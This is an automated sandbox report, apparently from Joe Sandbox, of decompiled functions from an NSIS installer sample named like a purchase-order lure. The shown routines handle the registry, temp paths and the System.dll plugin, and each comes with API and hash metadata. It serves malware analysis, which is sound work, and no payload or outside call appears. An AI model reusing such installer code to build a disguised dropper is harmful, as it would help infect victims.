                                                                                      						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
                                                                                      					}
                                                                                      					if(_t37 == 4) {
                                                                                      						_t27 = E00402D84(3);
                                                                                      						_pop(_t32);
                                                                                      						 *0x40b5f8 = _t27;
                                                                                      						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                                      						_t24 = _t37;
                                                                                      					}
                                                                                      					if(_t37 == 3) {
                                                                                      						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800);
                                                                                      					}
                                                                                      					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24) == 0) {
                                                                                      						 *(_t39 - 4) = _t30;
                                                                                      					}
                                                                                      					_push( *(_t39 + 8));
                                                                                      					RegCloseKey();
                                                                                      				}
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                                      				return 0;
                                                                                      			}














                                                                                      0x0040248a
                                                                                      0x0040248a
                                                                                      0x0040248a
                                                                                      0x0040248a
                                                                                      0x0040248d
                                                                                      0x00402494
                                                                                      0x0040249e
                                                                                      0x004024a1
                                                                                      0x004024aa
                                                                                      0x004024b1
                                                                                      0x004024b8
                                                                                      0x004024bb
                                                                                      0x004024c1
                                                                                      0x004024cb
                                                                                      0x004024cf
                                                                                      0x004024da
                                                                                      0x004024da
                                                                                      0x004024e1
                                                                                      0x004024e5
                                                                                      0x004024ea
                                                                                      0x004024eb
                                                                                      0x004024f1
                                                                                      0x004024f4
                                                                                      0x004024f4
                                                                                      0x004024f8
                                                                                      0x00402504
                                                                                      0x00402504
                                                                                      0x0040251d
                                                                                      0x0040251f
                                                                                      0x0040251f
                                                                                      0x00402522
                                                                                      0x004025fd
                                                                                      0x004025fd
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsdFF63.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsdFF63.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsdFF63.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsdFF63.tmp
                                                                                      • API String ID: 2655323295-2277788088
                                                                                      • Opcode ID: ccbced7c383fe36513b27ab0f3831983de96ef15fa0590e398bf5cccbf7e4235
                                                                                      • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                                                                      • Opcode Fuzzy Hash: ccbced7c383fe36513b27ab0f3831983de96ef15fa0590e398bf5cccbf7e4235
                                                                                      • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 53%
                                                                                      			E0040603F(void* __eflags, intOrPtr _a4) {
                                                                                      				int _t11;
                                                                                      				signed char* _t12;
                                                                                      				intOrPtr _t18;
                                                                                      				intOrPtr* _t21;
                                                                                      				signed int _t23;
                                                                                      
                                                                                      				E00406668(0x425f50, _a4);
                                                                                      				_t21 = E00405FE2(0x425f50);
                                                                                      				if(_t21 != 0) {
                                                                                      					E004068EF(_t21);
                                                                                      					if(( *0x42a278 & 0x00000080) == 0) {
                                                                                      						L5:
                                                                                      						_t23 = _t21 - 0x425f50 >> 1;
                                                                                      						while(1) {
                                                                                      							_t11 = lstrlenW(0x425f50);
                                                                                      							_push(0x425f50);
                                                                                      							if(_t11 <= _t23) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t12 = E0040699E();
                                                                                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                      								E00405F83(0x425f50);
                                                                                      								continue;
                                                                                      							} else {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      						}
                                                                                      						E00405F37();
                                                                                      						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                                      					}
                                                                                      					_t18 =  *_t21;
                                                                                      					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                      						goto L1;
                                                                                      					} else {
                                                                                      						goto L5;
                                                                                      					}
                                                                                      				}
                                                                                      				L1:
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x0040604b
                                                                                      0x00406056
                                                                                      0x0040605a
                                                                                      0x00406061
                                                                                      0x0040606d
                                                                                      0x0040607d
                                                                                      0x0040607f
                                                                                      0x00406097
                                                                                      0x00406098
                                                                                      0x0040609f
                                                                                      0x004060a0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406083
                                                                                      0x0040608a
                                                                                      0x00406092
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040608a
                                                                                      0x004060a2
                                                                                      0x00000000
                                                                                      0x004060b6
                                                                                      0x0040606f
                                                                                      0x00406075
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406075
                                                                                      0x0040605c
                                                                                      0x00000000

                                                                                      APIs
                                                                                        • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                        • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4pu.pu,?,75702EE0,00405D94,?,75703420,75702EE0,00000000), ref: 00405FF0
                                                                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                      • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50, 4pu.pu,?,75702EE0,00405D94,?,75703420,75702EE0,00000000), ref: 00406098
                                                                                      • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50, 4pu.pu,?,75702EE0,00405D94,?,75703420,75702EE0), ref: 004060A8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: 4pu.pu$P_B
                                                                                      • API String ID: 3248276644-795358308
                                                                                      • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                      • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                      • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                      • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 58%
                                                                                      			E00405F37(WCHAR* _a4) {
                                                                                      				WCHAR* _t9;
                                                                                      
                                                                                      				_t9 = _a4;
                                                                                      				_push( &(_t9[lstrlenW(_t9)]));
                                                                                      				_push(_t9);
                                                                                      				if( *(CharPrevW()) != 0x5c) {
                                                                                      					lstrcatW(_t9, 0x40a014);
                                                                                      				}
                                                                                      				return _t9;
                                                                                      			}




                                                                                      0x00405f38
                                                                                      0x00405f45
                                                                                      0x00405f46
                                                                                      0x00405f51
                                                                                      0x00405f59
                                                                                      0x00405f59
                                                                                      0x00405f61

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-3355392842
                                                                                      • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                      • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                      • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                      • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E715D10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                                                      				void* _v0;
                                                                                      				void* _t27;
                                                                                      				signed int _t29;
                                                                                      				void* _t30;
                                                                                      				void* _t34;
                                                                                      				void* _t36;
                                                                                      				void* _t38;
                                                                                      				void* _t40;
                                                                                      				void* _t48;
                                                                                      				void* _t54;
                                                                                      				void* _t63;
                                                                                      				void* _t64;
                                                                                      				signed int _t66;
                                                                                      				void* _t67;
                                                                                      				void* _t73;
                                                                                      				void* _t74;
                                                                                      				void* _t77;
                                                                                      				void* _t80;
                                                                                      				void _t81;
                                                                                      				void _t82;
                                                                                      				intOrPtr _t84;
                                                                                      				void* _t86;
                                                                                      				void* _t88;
                                                                                      
                                                                                      				 *0x715d506c = _a8;
                                                                                      				 *0x715d5070 = _a16;
                                                                                      				 *0x715d5074 = _a12;
                                                                                      				_a12( *0x715d5048, E715D1651, _t73);
                                                                                      				_t66 =  *0x715d506c +  *0x715d506c * 4 << 3;
                                                                                      				_t27 = E715D12E3();
                                                                                      				_v0 = _t27;
                                                                                      				_t74 = _t27;
                                                                                      				if( *_t27 == 0) {
                                                                                      					L28:
                                                                                      					return GlobalFree(_t27);
                                                                                      				}
                                                                                      				do {
                                                                                      					_t29 =  *_t74 & 0x0000ffff;
                                                                                      					_t67 = 2;
                                                                                      					_t74 = _t74 + _t67;
                                                                                      					_t88 = _t29 - 0x66;
                                                                                      					if(_t88 > 0) {
                                                                                      						_t30 = _t29 - 0x6c;
                                                                                      						if(_t30 == 0) {
                                                                                      							L23:
                                                                                      							_t31 =  *0x715d5040;
                                                                                      							if( *0x715d5040 == 0) {
                                                                                      								goto L26;
                                                                                      							}
                                                                                      							E715D1603( *0x715d5074, _t31 + 4, _t66);
                                                                                      							_t34 =  *0x715d5040;
                                                                                      							_t86 = _t86 + 0xc;
                                                                                      							 *0x715d5040 =  *_t34;
                                                                                      							L25:
                                                                                      							GlobalFree(_t34);
                                                                                      							goto L26;
                                                                                      						}
                                                                                      						_t36 = _t30 - 4;
                                                                                      						if(_t36 == 0) {
                                                                                      							L13:
                                                                                      							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                      							_t74 = _t74 + _t67;
                                                                                      							_t34 = E715D1312(E715D135A(_t38));
                                                                                      							L14:
                                                                                      							goto L25;
                                                                                      						}
                                                                                      						_t40 = _t36 - _t67;
                                                                                      						if(_t40 == 0) {
                                                                                      							L11:
                                                                                      							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                      							_t74 = _t74 + _t67;
                                                                                      							_t34 = E715D1381(_t80, E715D12E3());
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						L8:
                                                                                      						if(_t40 == 1) {
                                                                                      							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                                                      							_t10 = _t81 + 4; // 0x4
                                                                                      							E715D1603(_t10,  *0x715d5074, _t66);
                                                                                      							_t86 = _t86 + 0xc;
                                                                                      							 *_t81 =  *0x715d5040;
                                                                                      							 *0x715d5040 = _t81;
                                                                                      						}
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					if(_t88 == 0) {
                                                                                      						_t48 =  *0x715d5070;
                                                                                      						_t77 =  *_t48;
                                                                                      						 *_t48 =  *_t77;
                                                                                      						_t49 = _v0;
                                                                                      						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                                                      						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                                                      							E715D1603(_t49, _t77 + 8, 0x38);
                                                                                      							_t86 = _t86 + 0xc;
                                                                                      						}
                                                                                      						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                                                      						GlobalFree(_t77);
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					_t54 = _t29 - 0x46;
                                                                                      					if(_t54 == 0) {
                                                                                      						_t82 = GlobalAlloc(0x40,  *0x715d506c +  *0x715d506c + 8);
                                                                                      						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                                                      						_t14 = _t82 + 8; // 0x8
                                                                                      						E715D1603(_t14, _v0, 0x38);
                                                                                      						_t86 = _t86 + 0xc;
                                                                                      						 *_t82 =  *( *0x715d5070);
                                                                                      						 *( *0x715d5070) = _t82;
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					_t63 = _t54 - 6;
                                                                                      					if(_t63 == 0) {
                                                                                      						goto L23;
                                                                                      					}
                                                                                      					_t64 = _t63 - 4;
                                                                                      					if(_t64 == 0) {
                                                                                      						 *_t74 =  *_t74 + 0xa;
                                                                                      						goto L13;
                                                                                      					}
                                                                                      					_t40 = _t64 - _t67;
                                                                                      					if(_t40 == 0) {
                                                                                      						 *_t74 =  *_t74 + 0xa;
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					goto L8;
                                                                                      					L26:
                                                                                      				} while ( *_t74 != 0);
                                                                                      				_t27 = _v0;
                                                                                      				goto L28;
                                                                                      			}


























                                                                                      0x715d10eb
                                                                                      0x715d1100
                                                                                      0x715d1109
                                                                                      0x715d110e
                                                                                      0x715d1119
                                                                                      0x715d111c
                                                                                      0x715d1125
                                                                                      0x715d1129
                                                                                      0x715d112b
                                                                                      0x715d12b0
                                                                                      0x715d12ba
                                                                                      0x715d12ba
                                                                                      0x715d1132
                                                                                      0x715d1132
                                                                                      0x715d1137
                                                                                      0x715d1138
                                                                                      0x715d113a
                                                                                      0x715d113d
                                                                                      0x715d1256
                                                                                      0x715d1259
                                                                                      0x715d1271
                                                                                      0x715d1271
                                                                                      0x715d1278
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1285
                                                                                      0x715d128a
                                                                                      0x715d128f
                                                                                      0x715d1294
                                                                                      0x715d129a
                                                                                      0x715d129b
                                                                                      0x00000000
                                                                                      0x715d129b
                                                                                      0x715d125b
                                                                                      0x715d125e
                                                                                      0x715d11bc
                                                                                      0x715d11bf
                                                                                      0x715d11c2
                                                                                      0x715d11cb
                                                                                      0x715d11d0
                                                                                      0x00000000
                                                                                      0x715d11d1
                                                                                      0x715d1264
                                                                                      0x715d1266
                                                                                      0x715d11a2
                                                                                      0x715d11a5
                                                                                      0x715d11a8
                                                                                      0x715d11b1
                                                                                      0x00000000
                                                                                      0x715d11b1
                                                                                      0x715d1164
                                                                                      0x715d1165
                                                                                      0x715d1177
                                                                                      0x715d1180
                                                                                      0x715d1184
                                                                                      0x715d118e
                                                                                      0x715d1191
                                                                                      0x715d1193
                                                                                      0x715d1193
                                                                                      0x00000000
                                                                                      0x715d1165
                                                                                      0x715d1143
                                                                                      0x715d1218
                                                                                      0x715d121d
                                                                                      0x715d1221
                                                                                      0x715d1223
                                                                                      0x715d122c
                                                                                      0x715d122f
                                                                                      0x715d1238
                                                                                      0x715d123d
                                                                                      0x715d123d
                                                                                      0x715d1247
                                                                                      0x715d124a
                                                                                      0x00000000
                                                                                      0x715d1250
                                                                                      0x715d1149
                                                                                      0x715d114c
                                                                                      0x715d11e9
                                                                                      0x715d11ed
                                                                                      0x715d11f7
                                                                                      0x715d11fb
                                                                                      0x715d1205
                                                                                      0x715d120a
                                                                                      0x715d1211
                                                                                      0x00000000
                                                                                      0x715d1211
                                                                                      0x715d1152
                                                                                      0x715d1155
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d115b
                                                                                      0x715d115e
                                                                                      0x715d11b8
                                                                                      0x00000000
                                                                                      0x715d11b8
                                                                                      0x715d1160
                                                                                      0x715d1162
                                                                                      0x715d119e
                                                                                      0x00000000
                                                                                      0x715d119e
                                                                                      0x00000000
                                                                                      0x715d12a1
                                                                                      0x715d12a1
                                                                                      0x715d12ab
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 715D1171
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 715D11E3
                                                                                      • GlobalFree.KERNEL32 ref: 715D124A
                                                                                      • GlobalFree.KERNEL32(?), ref: 715D129B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 715D12B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42123282822.00000000715D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 715D0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42123234806.00000000715D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123363731.00000000715D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123419116.00000000715D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_715d0000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: c2ffab75518c4d4fa0a6cdadc80d0e0e084355576eb14438ca7300c769faaf97
                                                                                      • Instruction ID: 4e0580b815537211044b7e30ec7c3dd635d3fd7d48c0a5c3a8b37b54a823b27b
                                                                                      • Opcode Fuzzy Hash: c2ffab75518c4d4fa0a6cdadc80d0e0e084355576eb14438ca7300c769faaf97
                                                                                      • Instruction Fuzzy Hash: E1518DB6904202DFE709DFBEC9C8A297BF8FB48315B11851AE9D6DB610E731A940CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 92%
                                                                                      			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                                      				signed int _t14;
                                                                                      				int _t17;
                                                                                      				void* _t24;
                                                                                      				intOrPtr* _t29;
                                                                                      				void* _t31;
                                                                                      				signed int _t32;
                                                                                      				void* _t35;
                                                                                      				void* _t40;
                                                                                      				signed int _t42;
                                                                                      
                                                                                      				_t29 = __edi;
                                                                                      				_t24 = __ebx;
                                                                                      				_t14 =  *(_t35 - 0x28);
                                                                                      				_t40 = __edx - 0x38;
                                                                                      				 *(_t35 - 0x10) = _t14;
                                                                                      				_t27 = 0 | _t40 == 0x00000000;
                                                                                      				_t32 = _t40 == 0;
                                                                                      				if(_t14 == __ebx) {
                                                                                      					if(__edx != 0x38) {
                                                                                      						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                                                      					} else {
                                                                                      						E00402DA6(0x21);
                                                                                      						E0040668A("C:\Users\Arthur\AppData\Local\Temp\nsdFF63.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsdFF63.tmp\System.dll", 0x400);
                                                                                      						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsdFF63.tmp\System.dll");
                                                                                      					}
                                                                                      				} else {
                                                                                      					E00402D84(1);
                                                                                      					 *0x40adf8 = __ax;
                                                                                      					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                                      				}
                                                                                      				 *(_t35 + 8) = _t17;
                                                                                      				if( *_t29 == _t24) {
                                                                                      					L13:
                                                                                      					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                      				} else {
                                                                                      					_t31 = E004065C8(_t27, _t29);
                                                                                      					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
                                                                                      						_t14 = E0040620A(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsdFF63.tmp\System.dll",  *(_t35 + 8));
                                                                                      						_t42 = _t14;
                                                                                      						if(_t42 == 0) {
                                                                                      							goto L13;
                                                                                      						}
                                                                                      					} else {
                                                                                      						goto L13;
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                      				return 0;
                                                                                      			}












                                                                                      0x0040263e
                                                                                      0x0040263e
                                                                                      0x0040263e
                                                                                      0x00402643
                                                                                      0x00402646
                                                                                      0x00402649
                                                                                      0x0040264e
                                                                                      0x00402650
                                                                                      0x00402670
                                                                                      0x004026aa
                                                                                      0x00402672
                                                                                      0x00402674
                                                                                      0x00402688
                                                                                      0x00402695
                                                                                      0x00402695
                                                                                      0x00402652
                                                                                      0x00402654
                                                                                      0x00402659
                                                                                      0x00402667
                                                                                      0x0040266a
                                                                                      0x004026af
                                                                                      0x004026b2
                                                                                      0x0040292e
                                                                                      0x0040292e
                                                                                      0x004026b8
                                                                                      0x004026c1
                                                                                      0x004026c3
                                                                                      0x004026e2
                                                                                      0x004015b4
                                                                                      0x004015b6
                                                                                      0x00000000
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004026c3
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsdFF63.tmp\System.dll), ref: 00402695
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsdFF63.tmp$C:\Users\user\AppData\Local\Temp\nsdFF63.tmp\System.dll
                                                                                      • API String ID: 1659193697-3323208190
                                                                                      • Opcode ID: 9a86cc41fb3ba1d07c106fca7ec167276fc7dee72b5d11bed2732143b2a4cd05
                                                                                      • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                                                      • Opcode Fuzzy Hash: 9a86cc41fb3ba1d07c106fca7ec167276fc7dee72b5d11bed2732143b2a4cd05
                                                                                      • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00403C25() {
                                                                                      				void* _t1;
                                                                                      				void* _t2;
                                                                                      				signed int _t11;
                                                                                      
                                                                                      				_t1 =  *0x40a018; // 0x2ec
                                                                                      				if(_t1 != 0xffffffff) {
                                                                                      					CloseHandle(_t1);
                                                                                      					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                      				}
                                                                                      				_t2 =  *0x40a01c; // 0x2f8
                                                                                      				if(_t2 != 0xffffffff) {
                                                                                      					CloseHandle(_t2);
                                                                                      					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                      					_t11 =  *0x40a01c;
                                                                                      				}
                                                                                      				E00403C82();
                                                                                      				return E00405D74(_t11, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\nsdFF63.tmp", 7);
                                                                                      			}






                                                                                      0x00403c25
                                                                                      0x00403c34
                                                                                      0x00403c37
                                                                                      0x00403c39
                                                                                      0x00403c39
                                                                                      0x00403c40
                                                                                      0x00403c48
                                                                                      0x00403c4b
                                                                                      0x00403c4d
                                                                                      0x00403c4d
                                                                                      0x00403c4d
                                                                                      0x00403c54
                                                                                      0x00403c66

                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                      • CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                      • C:\Users\user\AppData\Local\Temp\nsdFF63.tmp, xrefs: 00403C5B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
